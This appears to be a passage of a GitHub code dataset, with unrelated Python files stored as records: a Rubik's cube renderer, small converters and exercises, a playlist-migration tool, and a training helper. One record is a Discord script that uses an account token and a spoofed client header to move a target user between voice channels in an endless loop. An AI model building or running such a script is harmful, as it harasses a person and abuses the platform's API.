= settings.cube_initial_rotation_x * Mathf.DEG_TO_RAD\n        ry = settings.cube_initial_rotation_y * Mathf.DEG_TO_RAD\n        self.apply_rotation(rx, ry, settings.rotate_y_before_x_initially)\n\n        # auto-rotation\n        repeat = True\n        repetition_count = -1\n\n        if settings.cube_auto_rot_x_enabled:\n            begin = settings.cube_auto_rot_x_begin\n            end = settings.cube_auto_rot_x_end\n            time = settings.cube_auto_rot_x_time\n            jump_start = settings.cube_auto_rot_x_jump_start\n            ease = Tween.get_ease_type_by_name(settings.cube_auto_rot_x_ease_type)\n            self.auto_rot_x = Tween()\n            self.auto_rot_x.tween(begin, end, time, ease, repeat, repetition_count, jump_start)\n        else:\n            self.auto_rot_x = False\n\n        if settings.cube_auto_rot_y_enabled:\n            begin = settings.cube_auto_rot_y_begin\n            end = settings.cube_auto_rot_y_end\n            time = settings.cube_auto_rot_y_time\n            jump_start = settings.cube_auto_rot_y_jump_start\n            ease = Tween.get_ease_type_by_name(settings.cube_auto_rot_y_ease_type)\n            self.auto_rot_y = Tween()\n            self.auto_rot_y.tween(begin, end, time, ease, repeat, repetition_count, jump_start)\n        else:\n            self.auto_rot_y = False\n\n    def reset(self):\n        self.geometry = Geometry(self.size)\n        self.geometry.add_padding(self.padding)\n        self.queued_face_rotations = Queue(0)\n        self.tween = Tween()\n        self.state = State.IDLE\n        self.current_face_rotation = None\n\n    def apply_rotation(self, x, y, rotate_y_before_x=False):\n        qx = normalize(axisangle_to_q((1, 0, 0), x))\n        qy = normalize(axisangle_to_q((0, 1, 0), y))\n        if rotate_y_before_x:\n            self.accum = q_mult(self.accum, qy)\n            self.accum = q_mult(self.accum, qx)\n        else:\n            self.accum = 
q_mult(self.accum, qx)\n self.accum = q_mult(self.accum, qy)\n\n def update(self, elapsed_time):\n self.rot_x -= abs(self.rot_x) * self.angular_drag * elapsed_time * np.sign(self.rot_x)\n self.rot_y -= abs(self.rot_y) * self.angular_drag * elapsed_time * np.sign(self.rot_y)\n\n qx = normalize(axisangle_to_q((1, 0, 0), self.rot_x))\n qy = normalize(axisangle_to_q((0, 1, 0), self.rot_y))\n\n self.accum = q_mult(self.accum, qx)\n self.accum = q_mult(self.accum, qy)\n\n self.scale_speed -= abs(self.scale_speed) * self.scale_drag * elapsed_time * np.sign(self.scale_speed)\n self.scale += self.scale_speed\n if self.scale < self.min_scale:\n self.scale = self.min_scale\n self.scale_speed = 0\n if self.scale > self.max_scale:\n self.scale = self.max_scale\n self.scale_speed = 0\n\n self.update_queue()\n self.update_tween(elapsed_time)\n self.update_face_tweening()\n if self.auto_rot_x: self.auto_rot_x.update(elapsed_time)\n if self.auto_rot_y: self.auto_rot_y.update(elapsed_time)\n\n def render(self):\n # glPushMatrix()\n glLoadMatrixf(q_to_mat4(self.accum))\n glScalef(self.scale, self.scale, self.scale)\n\n if self.auto_rot_x:\n rot_x = self.auto_rot_x.get_current()\n glRotatef(rot_x, 1, 0, 0)\n if self.auto_rot_y:\n rot_y = self.auto_rot_y.get_current()\n glRotatef(rot_y, 0, 1, 0)\n\n if self.draw_sphere: self.render_sphere()\n if self.draw_cubies:\n if self.texture_mapping_enabled:\n self.render_cubies_with_textures()\n else:\n self.render_cubies()\n if self.draw_lines: self.render_lines()\n # glPopMatrix()\n\n def add_rotate_x(self, value): self.rot_x += value\n def add_rotate_y(self, value): self.rot_y += value\n def add_scale(self, value):\n self.scale_speed += value\n\n def reset_rotation(self):\n self.rot_x = 0\n self.rot_y = 0\n self.accum = (1, 0, 0, 0)\n\n def reset_scale(self): self.scale = 1\n\n def stop_rotation(self):\n self.rot_x = 0\n self.rot_y = 0\n\n def append_face_rotation(self, face_rotation):\n if type(face_rotation) == FaceRotation:\n self.queued_face_rotations.put(face_rotation)\n\n def scramble(self, face_rotations):\n theta = math.pi / 2\n for face in face_rotations:\n self.rotate_face(face, theta)\n\n def map_colors(self, front_color, back_color, left_color, right_color, up_color, down_color):\n self.face_colors = (front_color, left_color, back_color, right_color, up_color, down_color)\n\n def update_queue(self):\n if self.state == State.TWEENING or self.queued_face_rotations.empty(): return\n self.current_face_rotation = self.queued_face_rotations.get_nowait()\n self.state = State.TWEENING\n self.tween.tween(0, math.pi/2, self.face_rotation_tween_time, self.face_rotation_ease_type)\n\n def update_tween(self, elapsed_time):\n if self.state != State.TWEENING: return\n\n if self.tween.is_done():\n self.state = State.IDLE\n self.current_face_rotation = None\n else:\n self.tween.update(elapsed_time)\n\n def update_face_tweening(self):\n theta = self.tween.get_delta()\n self.rotate_face(self.current_face_rotation, theta)\n\n def rotate_face(self, face, theta):\n if (face == FaceRotation.FRONT_CW or\n face == FaceRotation.BACK_CCW or\n face == FaceRotation.LEFT_CCW or\n face == FaceRotation.RIGHT_CW or\n face == FaceRotation.UP_CW or\n face == FaceRotation.DOWN_CCW):\n theta *= -1\n if face == FaceRotation.FRONT_CW or face == FaceRotation.FRONT_CCW:\n self.rotate_front_face(theta)\n if face == FaceRotation.BACK_CW or face == FaceRotation.BACK_CCW:\n self.rotate_back_face(theta)\n if face == FaceRotation.LEFT_CW or face == FaceRotation.LEFT_CCW:\n 
self.rotate_left_face(theta)\n if face == FaceRotation.RIGHT_CW or face == FaceRotation.RIGHT_CCW:\n self.rotate_right_face(theta)\n if face == FaceRotation.UP_CW or face == FaceRotation.UP_CCW:\n self.rotate_up_face(theta)\n if face == FaceRotation.DOWN_CW or face == FaceRotation.DOWN_CCW:\n self.rotate_down_face(theta)\n\n def rotate_front_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[0]:\n for piece in pieces:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n #self.geometry.center_pieces[0][i] = z_rot(self.geometry.center_pieces[0][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n if vertex[2] < (self.size-1) - (layer*2):\n #if vertex[2] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[2] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n\n def rotate_back_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[2]:\n for piece in pieces:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n #self.geometry.center_pieces[2][i] = z_rot(self.geometry.center_pieces[2][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[2] > 0:\n if vertex[2] > (-self.size+1) + (layer*2): # or vertex[2] > (-self.size-1) + (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[2] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n\n def rotate_left_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[1]:\n for piece in pieces:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n #self.geometry.center_pieces[1][i] = x_rot(self.geometry.center_pieces[1][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[0] > 0:\n if vertex[0] > (-self.size+1) + (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[0] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n\n def rotate_right_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[3]:\n for piece in pieces:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n #self.geometry.center_pieces[3][i] = x_rot(self.geometry.center_pieces[3][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[0] < 0:\n if vertex[0] < (self.size-1) - (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[0] < 0:\n flag = False\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n\n def rotate_up_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[4]:\n for piece in pieces:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n #self.geometry.center_pieces[4][i] = y_rot(self.geometry.center_pieces[4][i], 
theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[1] < 0:\n if vertex[1] < (self.size-1) - (layer*2):\n #if vertex[1] < self.size - layer*2:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[1] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n\n def rotate_down_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[5]:\n for piece in pieces:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n #self.geometry.center_pieces[5][i] = y_rot(self.geometry.center_pieces[5][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[1] > 0:\n if vertex[1] > (-self.size+1) + (layer*2):\n #if vertex[1] > -self.size + layer*2:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[1] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n\n def render_sphere(self):\n glColor3f(self.sphere_color[0], self.sphere_color[1], self.sphere_color[2])\n glutSolidSphere(self.sphere_radius, self.sphere_slices, self.sphere_stacks)\n\n def render_axes(self):\n glLineWidth(1)\n glBegin(GL_LINES)\n for color, axis in zip(self.geometry.axis_colors, self.geometry.axes):\n glColor3f(color[0], color[1], color[2])\n for point in axis:\n p = self.geometry.axis_verts[point]\n glVertex3f(p[0], p[1], p[2])\n glEnd()\n\n def render_lines(self):\n print('render lines')\n glLineWidth(self.line_width)\n glColor3f(0, 0, 0)\n glBegin(GL_LINES)\n for axis in self.geometry.edge_pieces:\n for piece in axis:\n for edge in self.geometry.cube_edges:\n for vertex in edge:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n for piece in self.geometry.center_pieces:\n for edge in self.geometry.cube_edges:\n for vertex in edge:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n\n def render_cubies(self):\n inner_color = self.inner_color\n\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n glColor3f(color[0], color[1], color[2])\n for vertex in surface:\n v = self.geometry.center_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n j = 0\n for piece in self.geometry.center_pieces:\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for vertex in surface:\n v = self.geometry.center_pieces[j][vertex]\n glVertex3f(v[0], v[1], v[2])\n j += 1\n i += 1\n\n # render edge pieces\n for color, surface, face in zip(self.face_colors, self.geometry.cube_surfaces, self.geometry.edges):\n glColor3f(color[0], color[1], color[2])\n for piece_index in face:\n for piece in self.geometry.edge_pieces[piece_index[0]][piece_index[1]]:\n for vertex in surface:\n p = piece[vertex]\n #p = self.geometry.edge_pieces[piece[0]][piece[1]][vertex]\n glVertex3f(p[0], p[1], p[2])\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.edge_black_pat)):\n for face in self.geometry.edge_black_pat[i]:\n for pieces in self.geometry.edge_pieces[i]:\n for piece in pieces:\n for vertex in self.geometry.cube_surfaces[face]:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n\n # render corner 
pieces\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_color_pat[i]:\n color = self.face_colors[face]\n glColor3f(color[0], color[1], color[2])\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_black_pat[i]:\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n\n def render_cubies_with_textures(self):\n tex_coords = self.geometry.tex_coords\n inner_color = self.inner_color\n\n # render outer faces with an applied texture\n glBindTexture(GL_TEXTURE_2D, self.sticker_texture_id)\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n glColor3f(color[0], color[1], color[2])\n #ti = 0\n for pieces in self.geometry.center_pieces[i]:\n for piece in pieces:\n ti = 0\n for vertex in surface:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n i += 1\n\n # render edge pieces\n for color, surface, face in zip(self.face_colors, self.geometry.cube_surfaces, self.geometry.edges):\n glColor3f(color[0], color[1], color[2])\n for piece_index in face:\n # ti = 0\n for piece in self.geometry.edge_pieces[piece_index[0]][piece_index[1]]:\n ti = 0\n for vertex in surface:\n p = piece[vertex]\n #p = self.geometry.edge_pieces[piece[0]][piece[1]][vertex]\n glVertex3f(p[0], p[1], p[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n\n # render corner pieces\n for i in range(len(self.geometry.corner_color_pat)):\n for face in self.geometry.corner_color_pat[i]:\n color = self.face_colors[face]\n glColor3f(color[0], color[1], color[2])\n ti = 0\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n glEnd()\n\n # render inner faces without texture using only the inner color\n glBindTexture(GL_TEXTURE_2D, 0)\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n j = 0\n for pieces in self.geometry.center_pieces[i]:\n j = 0\n for piece in pieces:\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for vertex in surface:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n j += 1\n i += 1\n\n # render edge pieces\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.edge_black_pat)):\n for face in self.geometry.edge_black_pat[i]:\n for pieces in self.geometry.edge_pieces[i]:\n for piece in pieces:\n for vertex in self.geometry.cube_surfaces[face]:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n\n # render corner pieces\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_black_pat[i]:\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n","repo_name":"randomfox/PyRubixsCube","sub_path":"cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":23109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
+{"seq_id":"18508064500","text":"import time\r\n\r\ndef Main(): \r\n modeSelect = str.upper(input(\"\"\"Please select a mode: \r\n(1) Binary\r\n(2) Hex\r\n(3) Text\r\nSelection: \"\"\"))\r\n \r\n conversionString = input(\"Please enter the string to convert: \") \r\n if modeSelect in [\"1\", \"BINARY\"]: convertedString=Binary(conversionString, convertedString=\"\")\r\n elif modeSelect in [\"2\", \"HEX\"]: convertedString=Hex(conversionString, convertedString=\"\")\r\n elif modeSelect in [\"3\", \"TEXT\"]: convertedString=Text(conversionString, convertedString=\"\")\r\n else: \r\n print(\"Error: Invalid mode selected.\")\r\n Main()\r\n \r\n print(f\"Your converted string is: {convertedString}\")\r\n time.sleep(2); print(\"\\n\")\r\n\r\ndef Binary(conversionString, convertedString):\r\n for char in conversionString:\r\n if char in [\"0\", \"1\"]:\r\n if char == \"0\": convertedString+=\"1\"\r\n else: convertedString+=\"0\"\r\n else:\r\n print(\"Error: Ensure your string is valid for method of conversion.\")\r\n Main()\r\n return convertedString\r\n\r\ndef Hex(conversionString, convertedString):\r\n try: \r\n conversionString = str(bin(int(conversionString, 16)))\r\n except:\r\n print(\"Error: Ensure your string is valid for method of conversion.\")\r\n Main()\r\n for char in conversionString[2:]:\r\n if char in [\"0\", \"1\"]:\r\n if char == \"0\": convertedString+=\"1\"\r\n else: convertedString+=\"0\"\r\n else:\r\n print(\"Error: Something went wrong during hex to binary conversion.\")\r\n Main()\r\n convertedString = hex(int(convertedString, 2))\r\n return convertedString[2:].upper()\r\n\r\ndef Text(conversionString, convertedString):\r\n convertedStringHex = \"\"\r\n for char in conversionString:\r\n tempString = \"\"\r\n binChar = str(bin(ord(char)))[2:].zfill(8)\r\n for char in binChar:\r\n if char == \"0\": tempString+=\"1\"\r\n else: tempString+=\"0\"\r\n convertedString+=chr(int(tempString, 2))\r\n convertedStringHex+=hex(int(tempString, 2))[2:].upper()+\" \"\r\n print(f\"Your converted string in Hexadecimal is: {convertedStringHex}\")\r\n return convertedString\r\n\r\nwhile True:\r\n if __name__ == \"__main__\":\r\n print(\"\"\"-----------------------------------------------------\r\nWelcome to the NOT Converter; Created by Logan Heath.\r\n-----------------------------------------------------\"\"\")\r\n Main()","repo_name":"JustAHubber/Scripts","sub_path":"Logic Converters/NOT Converter/NOT Converter.py","file_name":"NOT Converter.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40339200502","text":"while True:\n # Nhập a và b từ bàn phím\n a = float(input(\"a=\"))\n b = float(input(\"b=\"))\n\n # Nhập toán tử từ bàn phím\n operator = input(\"Nhập toán tử (+, -, *, /): \")\n\n # Tính toán và in kết quả\n if operator == '+':\n print(f\"{a}+{int(b)}={a + b}\")\n elif operator == '-':\n print(f\"{a}-{int(b)}={a - b}\")\n elif operator == '*':\n print(f\"{a}*{int(b)}={a * b}\")\n elif operator == '/':\n if b == 0:\n print(\"Không thể chia cho 0!\")\n else:\n print(f\"{a}/{int(b)}={a / b}\")\n else:\n print(\"Toán tử không hợp lệ!\")\n\n # Hỏi người dùng có muốn tiếp tục tính toán hay không\n choice = input(\"Tiep tuc:\")\n if choice.lower() == 't':\n 
break\n","repo_name":"kingofforeverr/vantuan","sub_path":"Chuong3/baitapontapchuongphan2/41_bai4.py","file_name":"41_bai4.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71829887479","text":"import requests, time, json\r\n\r\nf = open('config.json', 'r')\r\ndata = json.load(f)\r\n\r\nUSERID = data['UserID']\r\nSERVERID = data['ServerID']\r\nCHANNELID = data['ChannelID']\r\nCHANNELID1 = data['ChannelID1']\r\nCHANNELID2 = data['ChannelID2']\r\nCHANNELID3 = data['ChannelID3']\r\nCHANNELID4 = data['ChannelID4']\r\nCHANNELID5 = data['ChannelID5']\r\nTOKEN = data['token']\r\n\r\nchannel = [CHANNELID, CHANNELID1, CHANNELID2, CHANNELID3, CHANNELID4, CHANNELID5]\r\ncount = 0\r\nwhile True:\r\n for channelid in channel:\r\n if count == 10:\r\n time.sleep(10)\r\n\r\n moove = requests.patch(f'https://discord.com/api/v9/guilds/{SERVERID}/members/{USERID}', json={\"channel_id\": f\"{channelid}\"}, headers={\"authorization\": TOKEN, \"accept-encoding\": \"gzip, deflate, br\", \"content-type\": \"application/json\", \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36\"})\r\n if moove.status_code == 200:\r\n print(\"User Mooved With Succes\")\r\n count += 1\r\n else:\r\n print(moove.text)\r\n print(\"CANT MOOVE FUCKING USER\")\r\n","repo_name":"HumanQueen/Auto-moov-discord","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39458354630","text":"# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n#\n#\n# @param head ListNode类\n# @return ListNode类\n#\nclass Solution:\n def deleteDuplicates(self , head ):\n # write code here\n # 需要用一个头发结点\n # 因为头节点可能和下一个结点相等\n res=ListNode(0)\n res.next=head\n prev=res\n curr=head\n while curr and curr.next:\n # 当前和下一个不等\n # 因为是有序链表,所以可以认为curr只出现一次\n if curr.val!=curr.next.val:\n prev=curr\n curr=curr.next\n else:\n # 否则的话需要一次遍历,直到下一个不等\n # 把这中间的结点删除(跳过)\n while curr.val==curr.next.val:\n curr=curr.next\n if not curr.next:\n break\n prev.next=curr.next\n curr=curr.next\n return res.next\n","repo_name":"imlauzh/LeetCode","sub_path":"NowCoder/NC24 删除有序链表中重复的元素-II.py","file_name":"NC24 删除有序链表中重复的元素-II.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21239945027","text":"from difflib import SequenceMatcher\nfrom re import compile, sub\nfrom typing import List, Optional\n\nfrom ytmusicapi import YTMusic\n\nytmusic = YTMusic(\"youtube_music/headers_auth.json\")\n\n\ndef get_string_similarity(a: str, b: str) -> float:\n return SequenceMatcher(a=a, b=b).ratio()\n\n\ndef delete_ytmusic_paylists():\n print(\"\\033[1;36mDeleting all playlists \\033[0m\")\n playlists = ytmusic.get_library_playlists(50) # TODO: Make this dynamic\n for playlist in playlists:\n ytmusic.delete_playlist(playlist.get(\"playlistId\"))\n print(f\"\\033[1;36m{playlist.get('title')} deleted\\033[0m\")\n\n\ndef clean_ytmusic_library():\n print(\"\\033[1;36mCleaning existing library \\033[0m\")\n library = ytmusic.get_library_songs(limit=3000) # TODO: Make this dynamic\n remove_tokens = [song.get(\"feedbackTokens\", []).get(\"remove\") for song in library]\n song_titles = [song.get(\"title\", \"\") for song in library]\n\n 
song_ptr = 0\n total_songs = len(remove_tokens)\n while song_ptr < total_songs:\n token = remove_tokens[song_ptr]\n\n remove_response = ytmusic.edit_song_library_status(feedbackTokens=token)\n is_processed = remove_response[\"feedbackResponses\"][0][\"isProcessed\"]\n print(f\"{int((song_ptr+1) * 100 / total_songs)}% - {song_titles[song_ptr]}\")\n if not is_processed:\n print(\"Error!\")\n else:\n song_ptr += 1\n\n\ndef get_matchting_song_by_time(yt_list_data: List[dict], spotify_data: dict):\n highest_avg = 0\n selected_song = None\n ERROR_RANGE = 2\n TITLE_CONSTANT = 1.3\n\n for yt_data in yt_list_data:\n if not (\n spotify_data[\"duration\"] - ERROR_RANGE\n <= yt_data[\"duration\"]\n <= spotify_data[\"duration\"] + ERROR_RANGE\n ):\n continue\n\n title_similarity = get_string_similarity(\n yt_data[\"title\"], spotify_data[\"title\"]\n )\n\n artist_similarity = get_string_similarity(\n yt_data[\"artists\"], spotify_data[\"artists\"]\n )\n\n album_similarity = get_string_similarity(\n yt_data[\"album\"], spotify_data[\"album\"]\n )\n\n avg = (\n (title_similarity * TITLE_CONSTANT) + artist_similarity + album_similarity\n ) / 3\n\n if avg > highest_avg and artist_similarity > 0.40 and title_similarity > 0.50:\n highest_avg = avg\n selected_song = yt_data\n\n return selected_song if highest_avg > 0.50 else None\n\n\ndef get_matching_song(\n yt_list_data: List[dict], spotify_data: dict, strict: bool\n) -> Optional[dict]:\n if strict:\n title_ratio = 0.50\n artist_ratio = 0.55\n album_ratio = 0.75\n title_album_ratio = 0.90\n else:\n title_ratio = 0.30\n artist_ratio = 0.50\n album_ratio = 0.75\n title_album_ratio = 0.50\n\n selected_song = None\n\n for yt_data in yt_list_data:\n title_similarity = get_string_similarity(\n yt_data[\"title\"], spotify_data[\"title\"]\n )\n\n if title_similarity < title_ratio:\n continue\n\n artist_similarity = get_string_similarity(\n yt_data[\"artists\"], spotify_data[\"artists\"]\n )\n\n if artist_similarity < artist_ratio:\n continue\n\n album_similarity = get_string_similarity(\n yt_data[\"album\"], spotify_data[\"album\"]\n )\n\n if album_similarity < album_ratio:\n yt_title_similar = selected_song and (\n get_string_similarity(selected_song[\"title\"], spotify_data[\"title\"])\n <= title_similarity\n ) # look for a more similar title\n if title_similarity >= title_album_ratio and (\n yt_title_similar or not selected_song\n ):\n prev_selected_song_album_similar = selected_song and (\n get_string_similarity(selected_song[\"album\"], spotify_data[\"album\"])\n > +album_similarity\n )\n selected_song = (\n selected_song if prev_selected_song_album_similar else yt_data\n )\n\n continue\n\n selected_song = (\n selected_song\n if selected_song\n and get_string_similarity(selected_song[\"title\"], spotify_data[\"title\"])\n >= title_similarity\n else yt_data\n )\n break\n\n return selected_song\n\n\ndef clean_title(title: str) -> str:\n title = title.lower()\n\n title = sub(\";[^;\\r\\n]+(?=(original|remaster|bonus|feat|with\\s)).*\", \"\", title)\n title = sub(\n \".([\\[\\(])[^\\)\\]]+(?=(riginal|emaster|onus|eat\\.|ith\\s|ingle|rom\\s)).*?([\\)\\]])\",\n \"\",\n title,\n )\n title = sub(\n \"-[^-\\r\\n]+(?=(original|remaster|bonus|feat|with\\s|single|from)).*\", \"\", title\n )\n title = sub(\".feat.*\", \"\", title)\n return title.strip()\n\n\ndef clean_artists(artist: str) -> str:\n artist = artist.lower()\n artist = sub(\",|\\ ?&\", \"\", artist)\n return artist.strip()\n\n\ndef clean_album(album: str) -> str:\n album = album.lower()\n album = 
sub(\".([\\[\\(])[^\\)\\]]+(?=(emaster)).*?([\\)\\]])\", \"\", album)\n album_regex = compile(\"[^A-Za-zÁÉÍÓÚáéíóúñÑ0-9 ]\")\n album = album_regex.sub(\"\", album)\n return album.strip()\n\n\ndef search_song(\n title: str, artists: List[str], album: str, duration: int, with_album: bool\n) -> Optional[dict]:\n title = clean_title(title)\n\n album = clean_album(album)\n album_first_word = album.split()[0] if album.split() else \"\"\n\n complete_artists = \", \".join(artists)\n\n search_query = (\n f\"{title} {complete_artists} {album_first_word if with_album else ''}\".strip()\n )\n search_result = ytmusic.search(query=search_query or \" \", filter=\"songs\")\n\n spotify_data = dict(\n title=title,\n artists=clean_artists(complete_artists),\n album=album.lower(),\n duration=duration,\n )\n yt_list_data = []\n\n for song_data in search_result:\n try:\n yt_artist = [\n artist.get(\"name\", \"\") for artist in song_data.get(\"artists\", [])\n ]\n yt_list_data.append(\n dict(\n title=clean_title(song_data[\"title\"]),\n artists=clean_artists(\", \".join(yt_artist)),\n album=clean_album(\n (song_data.get(\"album\", {}) or {}).get(\"name\", \"\")\n ),\n tokens=song_data.get(\"feedbackTokens\", {}),\n duration=song_data[\"duration_seconds\"],\n videoId=song_data[\"videoId\"],\n )\n )\n except AttributeError:\n print(song_data)\n return\n\n selected_song = get_matchting_song_by_time(yt_list_data, spotify_data)\n if not selected_song:\n selected_song = get_matching_song(yt_list_data, spotify_data, True)\n\n if not selected_song:\n spotify_data[\"artists\"] = clean_artists(artists[0])\n selected_song = get_matching_song(yt_list_data, spotify_data, False)\n\n return selected_song\n\n\ndef add_songs_to_library(token: str):\n is_processed = False\n while not is_processed:\n add_response = ytmusic.edit_song_library_status(feedbackTokens=token)\n is_processed = add_response[\"feedbackResponses\"][0][\"isProcessed\"]\n\n\ndef add_songs_to_playlist(playlist_id: str, videoId: str):\n ytmusic.add_playlist_items(playlist_id, [videoId])\n\n\ndef create_yt_playlist(name: str, description: str):\n return ytmusic.create_playlist(name, description)\n","repo_name":"PabloSanchez95/MusicMigrate","sub_path":"youtube_music/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40621828115","text":"# Refactoring of training loop\n# (support functions for training loop)\n\n# %%\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport pandas as pd\nimport numpy as np\n\nfrom pdb import set_trace\n\nRANDOM_SEED=42\nnp.random.seed(RANDOM_SEED)\ntorch.manual_seed(RANDOM_SEED)\n\n# %%\ndef compute_output_and_loss(model, data, target, loss_fn, survival=False):\n if survival==True:\n assert(target.shape[1]==2)\n output=model(data)\n # set_trace()\n loss=loss_fn(output, target)\n if survival==True:\n print(\"Add L1 Loss: Not implemented here yet\")\n return output, loss\n\n# %% \ndef forward_by_fp16(model, data, target, loss_fn, survival, fp16):\n if fp16==True:\n with torch.cuda.amp.autocast():\n output, loss=compute_output_and_loss(model=model,\n data=data, \n target=target, \n loss_fn=loss_fn, \n survival=survival)\n else:\n output, loss=compute_output_and_loss(model=model,\n data=data, \n target=target, \n loss_fn=loss_fn, \n survival=survival)\n return output, loss\n\n# %%\ndef on_forward(model, data, target, loss_fn=None, 
